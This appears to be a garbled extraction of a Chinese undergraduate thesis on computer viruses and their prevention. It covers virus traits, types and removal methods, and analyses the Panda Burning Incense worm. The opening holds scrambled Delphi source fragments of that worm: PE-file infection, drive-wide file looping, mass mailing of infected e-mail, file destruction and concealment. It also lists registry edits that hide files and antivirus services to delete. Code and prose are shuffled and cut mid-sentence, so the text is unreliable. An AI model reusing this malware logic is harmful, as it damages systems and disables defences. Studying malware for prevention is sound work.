【正文】 end。, faDirectory, SearchRec) = 0) then begin repeat if IsValidDir(SearchRec) = 1 then ()。 FreeAndNil(SubDir)。 while True do //死循環(huán) begin for i := Len downto 1 do //遍歷每個磁盤驅(qū)動器 LoopFiles(DriverList[i] + 39。 end。 //真正的宿主文件，多一個 空格 ExtractFile(TmpFile)。 //感染和發(fā)郵件 end。 TmpFile := TmpFile + 32 + 39。 //發(fā)帶毒郵件 Sleep(1000 * 60 * 5)。 //去死吧！ DriverList := GetDrives。39。 if (FindFirst(Path + 39。 //摧毀文件 end。.SWF39。.ASF39。.WMA39。.MDB39。.ADC39。.HTM39。 //調(diào)整消息隊列，避免引起懷疑 if IsValidDir(SearchRec) = 0 then begin Fn := Path + 。..39。 Fn, Ext: string。 Str := D + 39。 //刪除之 except end。 //每個間隔塊的大 小 Len := Length(Catchword)。 begin try SetFileAttributes(PChar(FileName), 0)。 //替換宿 主文件 。 //寫入已感染的標(biāo)記 (0, 2)。 18 finally 。 end。 if (Buf[0] = 80) and (Buf[1] = 69) then //PE 標(biāo)記 17 begin IsPE := True。 begin try //出錯則文件正在被使用，退出 if CompareText(FileName, 39。 16 { 感染 PE 文件 } procedure InfectOneFile(FileName: string)。 := nil。 end。 var sStream, dStream: TFileStream。 dCurPos := 。 end。 Pi: PROCESS_INFORMATION。 + 39。 //Upx 壓縮過病毒體的大小 IconOffset = $92BC。 并 修 改 以 下 值 不 顯 示 隱 藏 文 件 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue 0x00 刪除以下服務(wù) : navapsvc、 wscsvc、 KPfwSvc、 SNDSrvc、 ccProxy、 ccEvtMgr、ccSetMgr、 SPBBCSvc、 Symantec Core LC、 NPFMntor MskService、 FireSvc。 簡單點(diǎn)說，蠕蟲就是使用危害的代 碼來攻擊網(wǎng)絡(luò)上的受害主機(jī)，并在受害主機(jī)上自我復(fù)制，再攻擊其他的受害主機(jī)的計算機(jī)病毒。 ，將源文件寫回 。此時，如果用戶事先提取并保存了自己硬盤中分區(qū)表的信息和 DOS 分區(qū)引導(dǎo)扇區(qū)信息，那么，恢復(fù)工作變得非常簡單。 使用專用工具治療被感染的程序時通常使用的治療方法。其代表有“ Hammer 6”等。代表有“ 13 Firday”。 在網(wǎng)絡(luò)操作情況下 ， 由于病毒程序由一個受感染的拷貝通過網(wǎng)絡(luò)系統(tǒng)反復(fù)傳 ， 病毒程序的清除愈加復(fù)雜 。 而且在傳染操作成后 ， 計算機(jī)系統(tǒng)仍能運(yùn)行 ， 被感染的程序仍能執(zhí)行 ， 這就是計機(jī)病毒傳染的隱蔽性 ?? 計算機(jī)病毒的潛伏性則是指 ， 某些編制巧的計算機(jī)病毒程序 ，進(jìn)入系統(tǒng)之后可以在幾周或者幾個月甚至年內(nèi)隱藏在合法文件中 ， 對其它系統(tǒng)文件進(jìn)行傳染 ， 而不被人發(fā)現(xiàn) 。 陜西師范大學(xué)網(wǎng)絡(luò)教育學(xué)院 畢業(yè)論文（設(shè)計） 論文題目 計算機(jī)病毒解析與防范 姓 名 學(xué) 號 專 業(yè) 計算機(jī)科學(xué)與技術(shù) 批次 /層次 指導(dǎo)教師 學(xué)習(xí)中心 1 目 錄 摘要 ....................................................3 1 引言 ..................................................3 2 正文 ..................................................3 計算機(jī)病毒的概述 ...............................3 計算機(jī)病毒的定義 ...............................4 計算機(jī)病毒的特性 ...............................4 計算機(jī)病毒的分類 ...............................4 計算機(jī)病毒的基本分類 ...........................4 計算機(jī)病毒防范和清除的基本原則和技術(shù) ...........6 計算機(jī)病毒防范的概念和原則 .....................6 計算機(jī)病毒防范基本技術(shù) .........................6 清除計算機(jī)病毒的基本方法 ...................... 6 典型計算機(jī)病毒的原理、防范和清除 ...............6 引導(dǎo)區(qū)計算機(jī)病毒 ...............................7 文件型計算機(jī)病毒 ...............................7 腳本型計算機(jī)病毒 ...............................8 特洛伊木馬計算機(jī)病毒 ...........................8 蠕蟲計算機(jī)病毒 .................................9 “熊貓燒香”病毒剖析 ............................9 2 計算機(jī)主要檢測技術(shù)和特點(diǎn) .........................26 3 參考資料 .............................................27 3 計算機(jī)病毒與防范 摘要 目前計算機(jī)的應(yīng)用遍及到社會的各個領(lǐng)域，同時計算機(jī)病毒也給我們帶來了巨大的破壞和潛在的威脅，因此為了確保計算機(jī)能夠安全工作，計算機(jī)病毒的防范工作，已經(jīng)迫在眉睫。 計算機(jī)病毒程序經(jīng)運(yùn)行取得系統(tǒng)控制權(quán) ， 可以在不到 1秒鐘的時間里傳染幾百個程序 。 病毒程序即使被發(fā) ， 已被破壞的數(shù)據(jù)和程序以及操作系統(tǒng)都難以恢復(fù) 。 傳統(tǒng)檔案型計算機(jī)病毒 傳統(tǒng)檔案型計算機(jī)病毒最大的特征，便是將計算機(jī)病毒本身植入檔案，使檔案膨脹，以達(dá)到散播傳染的目的。這類計算機(jī)病毒有的采用 INT 1 單步執(zhí)行的方式，逐步追蹤磁盤中斷的過程，找出 BIOS磁盤中斷的部分，供計算機(jī)病毒內(nèi)部使用；有的采用死機(jī)的方式，記錄幾個 BIOS版本的磁盤中斷原始進(jìn)入點(diǎn)，當(dāng)計算機(jī)病毒遭到熟悉的 BIOS 版本，便可直接呼叫磁 盤中斷，對磁盤予取予求；有的則分析磁盤中斷的程序片段，找出 BIOS中的相似部分便可直接呼叫磁盤中斷。但是，這種方法同樣對檢測者自身的專業(yè)素質(zhì)要求較高，而且治療效率也較低。 如何檢測呢？ INT 13H 中斷向量 、 DOS 分區(qū)引導(dǎo)扇區(qū)以及軟盤的引導(dǎo)扇區(qū) 清